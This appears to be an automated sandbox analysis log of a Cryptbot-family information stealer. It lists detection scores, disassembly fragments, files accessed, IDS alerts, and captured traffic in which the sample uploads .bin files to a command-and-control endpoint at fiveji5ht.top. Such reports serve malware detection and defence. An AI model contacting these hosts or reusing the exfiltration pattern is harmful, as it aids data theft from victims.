Source: C:\Users\user\AppData\Local\Temp\VSminERrlSkyavRAgpvj.dll |
ReversingLabs: Detection: 42% |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
ReversingLabs: Detection: 44% |
Source: R40XD2LfcZ.exe |
ReversingLabs: Detection: 28% |
Source: Submited Sample |
Integrated Neural Analysis Model: Matched 100.0% probability |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 8_2_005F15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, |
8_2_005F15B0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 8_2_6C9314B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext, |
8_2_6C9314B0 |
Source: R40XD2LfcZ.exe |
Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED |
Source: R40XD2LfcZ.exe |
Static PE information: DYNAMIC_BASE, NX_COMPAT |
Source: C:\Users\user\Desktop\R40XD2LfcZ.exe |
File opened: C:\Users\user\Desktop\desktop.ini |
Jump to behavior |
Source: C:\Users\user\Desktop\R40XD2LfcZ.exe |
File opened: C:\Users\user\Documents\desktop.ini |
Jump to behavior |
Source: C:\Users\user\Desktop\R40XD2LfcZ.exe |
File opened: C:\Users\user\AppData\Local |
Jump to behavior |
Source: C:\Users\user\Desktop\R40XD2LfcZ.exe |
File opened: C:\Users\user\AppData |
Jump to behavior |
Source: C:\Users\user\Desktop\R40XD2LfcZ.exe |
File opened: C:\Users\user\AppData\Local\Temp |
Jump to behavior |
Source: C:\Users\user\Desktop\R40XD2LfcZ.exe |
File opened: C:\Users\user |
Jump to behavior |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea ecx, dword ptr [esp+04h] |
8_2_005F81E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C9AAC70 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C9AAD20 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C9AAD20 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push edi |
8_2_6C9D2EF0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C94AF80 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, 6CA0F960h |
8_2_6C94E8C0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C95E490 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
8_2_6C95E490 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
8_2_6C9504F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, ecx |
8_2_6C9D04E0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C950610 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C95A790 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
8_2_6C95A790 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
8_2_6C95A720 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
8_2_6C950010 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [6CA0D014h] |
8_2_6CA04110 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx] |
8_2_6C95C2C0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C954203 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebx |
8_2_6C9D8250 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C95A3A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
8_2_6C95A3A0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+08h] |
8_2_6C95A330 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C9ABDF0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [ecx+04h] |
8_2_6C989F90 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C9ABF50 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
8_2_6C96B987 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
8_2_6C96B98B |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
8_2_6C989910 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
8_2_6C9E9900 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C9ABAC0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push esi |
8_2_6C9A7AC0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+0Ch] |
8_2_6C95D424 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, 6CA0DFF4h |
8_2_6C9A3440 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+08h] |
8_2_6C95D5A4 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push edi |
8_2_6C9A35F0 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then lea eax, dword ptr [ecx+04h] |
8_2_6C95D724 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C95D050 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebx |
8_2_6C9C7100 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then sub esp, 1Ch |
8_2_6C9AB280 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then push ebp |
8_2_6C95D2B4 |
Source: C:\Users\user\AppData\Local\Temp\service123.exe |
Code function: 4x nop then mov eax, dword ptr [esp+04h] |
8_2_6C9A93B0 |
Source: chrome.exe |
Memory has grown: Private usage: 5MB later: 27MB |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:49824 -> 34.175.139.104:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:51046 -> 34.175.139.104:80 |
Source: Network traffic |
Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.9:51104 -> 34.175.139.104:80 |
Source: global traffic |
TCP traffic: 192.168.2.9:51029 -> 1.1.1.1:53 |
Source: global traffic |
HTTP traffic detected: GET /daxtYswdSfyAXDsFwHuK1729862657 HTTP/1.1Host: home.fiveji5ht.topAccept: */* |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fiveji5ht.topAccept: */*Content-Length: 464Content-Type: multipart/form-data; boundary=------------------------VlM6myZs8i6ccTmt0M9HIxData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 56 6c 4d 36 6d 79 5a 73 38 69 36 63 63 54 6d 74 30 4d 39 48 49 78 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 47 75 63 6f 62 75 74 75 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 12 bf 6d 6d 0c e3 ad bd c2 e4 02 b4 30 fd f9 f7 70 12 e6 c3 5e 7f 75 49 99 e9 02 5d e8 eb 3b ae e8 5e 6f e1 16 e3 69 6b 98 2e d3 40 71 58 d7 76 b8 01 b4 05 7e 41 ae 38 df 31 54 fe 93 09 0c 8c ed 49 cc c1 1b 40 7b 98 61 d5 c2 e3 82 05 8a cc 14 aa 39 7d ef 64 2d c9 33 50 b4 df 25 25 08 77 94 7d 3b a4 dc a5 47 43 20 06 e7 94 b4 c7 51 d7 0e 9c 4f d9 a4 ed f6 a1 27 2a de 45 c0 91 85 a9 3e 83 c1 5c 6f 82 ae 0e a7 22 a4 8c 6e d8 0e 05 fc 3a e3 f5 3f a2 da 45 9a 21 1f db 88 10 16 ff ed 6b 36 89 28 06 7b 37 ae ec 0c 99 73 3d cc 43 24 af 0b a6 62 6e b1 7f 74 bf 13 86 af c4 62 0c 20 b9 11 07 a3 f4 2d 82 d0 c9 92 8c e0 b0 95 1e 93 ab d2 df cc dc e6 98 4f 70 f8 6f 60 80 21 d4 02 13 2f 8b 22 a5 3a 55 c6 a9 77 6a d7 18 ff 1a 91 b0 54 70 8e 6c c8 05 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 56 6c 4d 36 6d 79 5a 73 38 69 36 63 63 54 6d 74 30 4d 39 48 49 78 2d 2d 0d 0a Data Ascii: --------------------------VlM6myZs8i6ccTmt0M9HIxContent-Disposition: form-data; name="file"; filename="Gucobutu.bin"Content-Type: application/octet-streammm0p^uI];^oik.@qXv~A81TI@{a9}d-3P%%w};GC QO'*E>\o"n:?E!k6({7s=C$bntb -Opo`!/":UwjTpl--------------------------VlM6myZs8i6ccTmt0M9HIx-- |
Source: global traffic |
HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fiveji5ht.topAccept: */*Content-Length: 95321Content-Type: multipart/form-data; boundary=------------------------xqtQaHw0pTCrCO6kdc27aoData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 78 71 74 51 61 48 77 30 70 54 43 72 43 4f 36 6b 64 63 32 37 61 6f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 52 69 79 61 67 65 70 69 64 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 74 b2 42 28 73 fe 4e ad 6b 24 ac a6 5a b6 b2 e9 3d f0 c9 c6 ce 87 b5 b8 79 48 bd ce dc 26 71 86 42 30 06 78 ac 5e 20 71 28 23 c5 b9 6e eb 96 96 9b 7f e2 11 64 7a c3 aa ce bf 29 96 0e 3a a0 c4 37 59 c3 67 a1 a3 f9 58 38 84 d0 33 15 e9 c7 90 8c 58 d3 39 a6 69 39 cc a9 1c b0 e8 2c 0b 18 a9 c0 7f 18 d9 18 c2 d3 9a 21 82 c0 de b8 73 46 fd 30 d1 86 c5 c2 a3 0c 34 5c 52 b1 9b 5d a9 cf 44 49 88 00 0e 18 be 2f e0 c3 35 62 17 40 be 7e a9 7f 28 0f 0e b0 8b e7 95 1a ee ae 2f dd 63 6c 9c 7c 12 ee 8e 85 98 88 d7 cc 01 4a 63 38 e0 6e 8b cd 53 95 ca 8d e9 74 a3 09 a1 b3 5e 1b 1f 5d 0e 3c b2 ca 08 18 e6 25 fd ee 5c 8d cc 6c 89 44 2e 59 90 58 77 cb 77 b3 81 da 33 47 34 fa e9 ec b2 72 f6 d1 19 9b 9c 07 d5 4d 35 e1 f1 12 af 14 b0 b6 04 1c cd 4d 20 d7 ef 41 a6 f7 59 79 c7 73 0e 17 41 92 8a e6 79 70 d3 1c a4 50 e7 66 f2 81 9f 4f 41 4d d0 a6 4e 53 48 bd a8 36 5c 99 7f 89 7b d7 bc 3c e9 0c a0 ea bd 79 a9 d9 7f 08 da bb 54 06 4a fd 7b b5 98 ae 87 be fb b3 c0 91 75 1b c7 44 98 63 39 a7 f6 87 cc 1e 09 92 64 aa a2 b9 55 59 ba 56 59 43 ae 1e 07 91 8b ff 2c 60 a3 b5 3f 30 a8 d9 5c 0a 94 3a 8d f7 c3 d2 55 4d ab b4 f2 0f 4c 96 1f 65 d5 55 37 98 05 97 59 56 76 4d cb 8a 38 46 02 7f 3e 78 cc 12 0e 60 6d e1 3c 08 80 a1 25 da 66 25 12 da b2 bb 99 fd 0f 90 57 02 e6 95 58 65 c6 7c bd 19 20 34 f0 43 8c 1f a1 e0 cf ed c3 d2 a9 b8 98 87 30 b1 4a 49 2e 27 f9 3e f4 51 43 25 e9 a6 c0 d6 94 19 1e c2 ca 84 6d 47 e6 f7 eb 0e a8 6a 92 08 e4 22 04 cb 99 3c 73 30 91 27 b6 17 b6 bf 6a 1f 7c 8e 32 40 dd 1a cb d1 9f 88 e0 af 3e 63 ab e7 20 66 74 df 72 df 11 9c fb 13 5d 6e 00 42 f9 39 e0 18 8d ab 44 aa d0 80 74 84 91 e6 b0 15 2e 0f d9 28 0e 7f fe 92 e8 27 0a 23 b2 95 19 10 3c 44 ae 9d 8f 7d 67 82 8d ad 83 90 77 3f dc 63 70 34 a2 9d 7c f2 1b da 8c f0 b4 60 fa 14 03 32 c1 71 56 2c b1 33 05 1d 29 12 bb ad 93 |